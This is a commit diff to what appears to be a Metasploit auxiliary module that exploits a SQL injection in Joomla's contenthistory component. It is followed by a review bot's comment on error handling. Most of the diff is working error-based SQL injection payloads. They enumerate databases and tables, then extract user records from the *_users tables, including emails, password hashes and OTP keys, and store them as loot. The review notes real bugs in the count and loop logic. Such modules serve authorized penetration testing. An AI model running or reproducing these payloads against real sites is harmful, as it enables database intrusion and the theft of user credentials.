
Commit 07d549d

committed
Update joomla_contenthistory_sqli.rb
Remove sessions for now
1 parent e4281dd commit 07d549d


1 file changed

+50
-55
lines changed

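--- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
+++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
@@ -58,69 +58,64 @@ def run
 left_marker = Rex::Text.rand_text_alpha(5)
 right_marker = Rex::Text.rand_text_alpha(5)
 
-if datastore['ACTION'] == 'HASHES'
-db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-res = sqli(db_count)
-db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-
-dbs = []
-0.upto(db_count-1) do |i|
-db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+res = sqli(db_count)
+db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+
+dbs = []
+0.upto(db_count-1) do |i|
+db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+res = sqli(db)
+dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+end
 
-res = sqli(db)
-dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+dbs.delete('performance_schema')
+dbs.delete('information_schema')
+dbs.delete('mysql')
+
+users = []
+dbs.each do |db|
+vprint_status("Found database: " + db)
+tables = []
+table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+res = sqli(table_count)
+table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+
+0.upto(table_count-1) do |i|
+table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+res = sqli(table)
+table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+tables << table if table =~ /_users$/
 end
 
-dbs.delete('performance_schema')
-dbs.delete('information_schema')
-dbs.delete('mysql')
-
-users = []
-dbs.each do |db|
-
-tables = []
-table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-res = sqli(table_count)
-table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-
-0.upto(table_count-1) do |i|
-table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-res = sqli(table)
-table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-tables << table if table =~ /_users$/
-end
-
-tables.each do |table|
-
-user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-res = sqli(user_count)
-user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
-
-0.upto(user_count-1) do |i|
-user = {}
-cols.each do |col|
-k = 1
-val = nil
-user[col] = ''
-while val != ''
-get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-res = sqli(get_col)
-val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-user[col] << val
-k = k + 54
-end
+tables.each do |table|
+vprint_status("Found table: " + table)
+user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+res = sqli(user_count)
+user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
+
+0.upto(user_count-1) do |i|
+user = {}
+cols.each do |col|
+k = 1
+val = nil
+user[col] = ''
+while val != ''
+get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+res = sqli(get_col)
+val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+user[col] << val
+k = k + 54
 end
-users << user
 end
+users << user
 end
 end
-p users.to_json
-elsif datastore['ACTION'] == 'SESSIONS'
-
-else
-fail_with(Failure::Unknown, "The ACTION " + datastore['ACTION'] + " is not supported.")
 end
+
+path = store_loot('joomla.file', 'text/plain', datastore['RHOST'], users.to_json, 'joomla.users')
+print_good("Users saved to file: " + path)
 end
 
 def sqli(payload)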
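Review bot: The three count lines on the new side (`db_count = $1.to_i || 0 if res and ...`, and the matching `table_count` and `user_count` lines) leave the variable holding the payload string whenever `res` is nil or the markers are not found, so the following `0.upto(db_count-1)` raises NoMethodError on `String#-` instead of failing cleanly; the `|| 0` is also dead, since `Integer#to_i` never returns nil. Write each as a conditional, e.g. `db_count = (res && res.body =~ /#{left_marker}(.*)#{right_marker}/) ? $1.to_i : 0`, and the same for the two later counts. The per-column `while val != ''` loop has the related problem that a missing response leaves `val` unchanged (nil on the first pass, where `user[col] << val` raises TypeError; its previous chunk afterwards, so the loop never terminates and keeps re-appending it); add `break unless res && res.body =~ /#{left_marker}(.*)#{right_marker}/` before `val = $1`. `run` begins before this hunk, and the removed `datastore['ACTION']` dispatch may still be referenced by the module's action list outside it — that cannot be checked from here.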
